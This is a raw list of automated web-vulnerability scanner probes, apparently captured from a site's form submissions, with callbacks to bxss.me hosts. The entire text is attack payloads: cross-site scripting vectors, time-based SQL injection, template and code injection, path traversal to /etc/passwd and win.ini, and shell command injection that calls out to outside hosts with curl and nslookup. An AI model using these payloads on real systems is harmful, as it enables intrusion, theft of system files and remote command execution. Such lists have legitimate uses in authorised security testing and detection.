1<InvalidTag >Zbps(9827)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx4760%C0%BEz1%C0%BCz2a%90bcxhjl4760
bfg6665%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6665
19387457
'"()&%<zzz><InvalidTag >Zbps(9398)</ScRiPt>
1'"()&%<zzz><InvalidTag >Zbps(9511)</ScRiPt>
1<arWL61H<
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1<img sRc='http://attacker-9657/log.php?
1<arqdF97 x=9058>
1<ifRAme sRc=9767.com></IfRamE>
1<WB931P>0ENQU[!+!]</WB931P>
1zzddS
1}body{zzz:Expre/**/SSion(Zbps(9642))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=Zbps(9236)>
�<img zzz onmouseover=Zbps(90171) //�>
1<ScRiPt>Zbps(9234)</sCripT>
1\u003CScRiPt\Zbps(9734)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289315%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9180)>
1<img src=xyz OnErRor=Zbps(9251)>
1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9718)>
1<body onload=Zbps(9794)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9577'>
1<isindex type=image src=1 onerror=Zbps(9439)>
1YmjmJ0Uo')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--
1<svg
1<InvalidTag
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9536></ScRiPt>
1<InvalidTag
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%30%34%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>Zbps(9115)</script>9115
1<InvalidTag>Zbps(9621)</script>
1<WVPZJ7>Y5IRU[!+!]</WVPZJ7>
1<InvalidTag >Zbps(9307)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
1MKDrFvPX') OR 964=(SELECT 964 FROM PG_SLEEP(15))--
dfb{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
<%={{={@{#{${dfb}}%>
bfgx9596%C0%BEz1%C0%BCz2a%90bcxhjl9596
bfg10959%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10959
19777082
'"()&%<zzz><InvalidTag >Zbps(9557)</ScRiPt>
1'"()&%<zzz><InvalidTag >Zbps(9943)</ScRiPt>
1Q7YXeaJc' OR 269=(SELECT 269 FROM PG_SLEEP(15))--
<!--
/\xfs.bxss.me?hkbakels.com.hk
//xfs.bxss.me?hkbakels.com.hk
xfs.bxss.me?hkbakels.com.hk
http://xfs.bxss.me?hkbakels.com.hk
'"
914428
xfs.bxss.me
<!--
'"
1-1)) OR 200=(SELECT 200 FROM PG_SLEEP(15))--
/\xfs.bxss.me?hkbakels.com.hk
//xfs.bxss.me?hkbakels.com.hk
xfs.bxss.me?hkbakels.com.hk
'+'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(97).concat(76)+(require'socket'
Socket.gethostbyname('hitre'+'wxprmyyab70f1.bxss.me.')[3].to_s)+'
http://xfs.bxss.me?hkbakels.com.hk
"+"A".concat(70-3).concat(22*4).concat(116).concat(77).concat(122).concat(77)+(require"socket"
Socket.gethostbyname("hitii"+"whnqxnxf36b44.bxss.me.")[3].to_s)+"
941193
xfs.bxss.me
1-1) OR 579=(SELECT 579 FROM PG_SLEEP(15))--
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(119).concat(88).concat(118).concat(73)+(require'socket'
"+"A".concat(70-3).concat(22*4).concat(112).concat(86).concat(120).concat(68)+(require"socket"
1-1 OR 197=(SELECT 197 FROM PG_SLEEP(15))--
bxss.me/t/xss.html?%00
HttP://bxss.me/t/xss.html?%00
1T0wNqcpt')); waitfor delay '0:0:15' --
bxss.me/t/xss.html?%00
HttP://bxss.me/t/xss.html?%00
bxss.me
c:/windows/win.ini
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1wjVdTELa'); waitfor delay '0:0:15' --
"+response.write(9413908*9422846)+"
'+response.write(9413908*9422846)+'
response.write(9413908*9422846)
19IUACRAh'; waitfor delay '0:0:15' --
"+response.write(9593238*9273440)+"
'+response.write(9593238*9273440)+'
bxss.me
c:/windows/win.ini
/etc/shells
response.write(9593238*9273440)
http://bxss.me/t/fit.txt%3F.jpg
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1-1 waitfor delay '0:0:15' --
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
${9999134+9999518}
${9999014+9999167}
<esi:include src="http://bxss.me/rpb.png"/>
1-1)); waitfor delay '0:0:15' --
<esi:include src="http://bxss.me/rpb.png"/>
1-1); waitfor delay '0:0:15' --
WEB-INF\web.xml
WEB-INF/web.xml
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/../../../../../../../../../../boot.ini
1-1; waitfor delay '0:0:15' --
../../../../../../../../../../windows/win.ini%00.jpg
C:\WINDOWS\system32\drivers\etc\hosts
file:///etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
;(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)|(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)&(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)
`(nslookup -q=cname hitaivbjzxvsidc455.bxss.me||curl hitaivbjzxvsidc455.bxss.me)`
|(nslookup -q=cname hitpqniwyknuc1c805.bxss.me||curl hitpqniwyknuc1c805.bxss.me)
&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&'\"`0&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&`'
&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&'\"`0&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&`'
$(nslookup -q=cname hitrsendnydfd9e9cb.bxss.me||curl hitrsendnydfd9e9cb.bxss.me)
WEB-INF\web.xml
(nslookup -q=cname hitaiqgljcczs7f6e8.bxss.me||curl hitaiqgljcczs7f6e8.bxss.me))
WEB-INF/web.xml
|echo ogmstl$()\ nlkjdq\nz^xyu||a #' |echo ogmstl$()\ nlkjdq\nz^xyu||a #|" |echo ogmstl$()\ nlkjdq\nz^xyu||a #
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
&echo voezyd$()\ msubnc\nz^xyu||a #' &echo voezyd$()\ msubnc\nz^xyu||a #|" &echo voezyd$()\ msubnc\nz^xyu||a #
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
echo lcspua$()\ cueipo\nz^xyu||a #' &echo lcspua$()\ cueipo\nz^xyu||a #|" &echo lcspua$()\ cueipo\nz^xyu||a #
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini%00.jpg
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
C:\WINDOWS\system32\drivers\etc\hosts
file:///etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
;(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)|(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)&(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)
`(nslookup -q=cname hiteesrlbeecxeb238.bxss.me||curl hiteesrlbeecxeb238.bxss.me)`
|(nslookup -q=cname hitdokxjpzpeb4ac5c.bxss.me||curl hitdokxjpzpeb4ac5c.bxss.me)
&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&'\"`0&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&`'
&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&'\"`0&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&`'
$(nslookup -q=cname hitooqpwajtnk925f0.bxss.me||curl hitooqpwajtnk925f0.bxss.me)
(nslookup -q=cname hitmnvrhcrcvo96792.bxss.me||curl hitmnvrhcrcvo96792.bxss.me))
|echo vaavse$()\ flvwgp\nz^xyu||a #' |echo vaavse$()\ flvwgp\nz^xyu||a #|" |echo vaavse$()\ flvwgp\nz^xyu||a #
&echo hapyvd$()\ ryxhzu\nz^xyu||a #' &echo hapyvd$()\ ryxhzu\nz^xyu||a #|" &echo hapyvd$()\ ryxhzu\nz^xyu||a #
'.print(md5(31337)).'
echo qenlvx$()\ ckirhq\nz^xyu||a #' &echo qenlvx$()\ ckirhq\nz^xyu||a #|" &echo qenlvx$()\ ckirhq\nz^xyu||a #
${@print(md5(31337))}\
${@print(md5(31337))}
1*if(now()=sysdate(),sleep(15),0)
";print(md5(31337));$a="
/../../../../../../../../../../windows/system32/BITSADMIN.exe
';print(md5(31337));$a='
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
/../../../../../../../../../../windows/system32/BITSADMIN.exe
dSh9t538
-1" OR 3*2>(0+5+675-675) --
-1" OR 3*2<(0+5+675-675) --
9VKhJDNS
-1" OR 3+675-675-1=0+0+0+1 --
-1" OR 2+675-675-1=0+0+0+1 --
-1' OR 3*2>(0+5+522-522) or 'YikRs8Xy'='
'.print(md5(31337)).'
&n904694=v968252
${@print(md5(31337))}\
-1' OR 3*2<(0+5+522-522) or 'YikRs8Xy'='
${@print(md5(31337))}
-1' OR 3+522-522-1=0+0+0+1 or 'YikRs8Xy'='
";print(md5(31337));$a="
-1' OR 2+522-522-1=0+0+0+1 or 'YikRs8Xy'='
&n943450=v998144
';print(md5(31337));$a='
-1' OR 3*2>(0+5+121-121) --
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1' OR 3*2<(0+5+121-121) --
-1' OR 3+121-121-1=0+0+0+1 --
-1' OR 2+121-121-1=0+0+0+1 --
-1 OR 3*2>(0+5+861-861)
-1 OR 3*2<(0+5+861-861)
-1 OR 3+861-861-1=0+0+0+1
".gethostbyname(lc("hitqx"."hiuvbjuc5983d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(74).chr(108).chr(74)."
-1 OR 2+861-861-1=0+0+0+1
'.gethostbyname(lc('hitpv'.'ogpbbemm536f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(109).chr(82).'
-1 OR 3*2>(0+5+320-320) --
-1 OR 3*2<(0+5+320-320) --
-1 OR 3+320-320-1=0+0+0+1 --
-1 OR 2+320-320-1=0+0+0+1 --
".gethostbyname(lc("hitkn"."boftnthj2785e.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(74).chr(117).chr(65)."
'.gethostbyname(lc('hitfe'.'tgmzsbwx71712.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(111).chr(66).'
"||sleep(27*1000)*kvyqaf||"
'||sleep(27*1000)*taubpo||'
"&&sleep(27*1000)*hqkwst&&"
'&&sleep(27*1000)*gjjjqs&&'
'"()
^(#$!@#$)(()))******
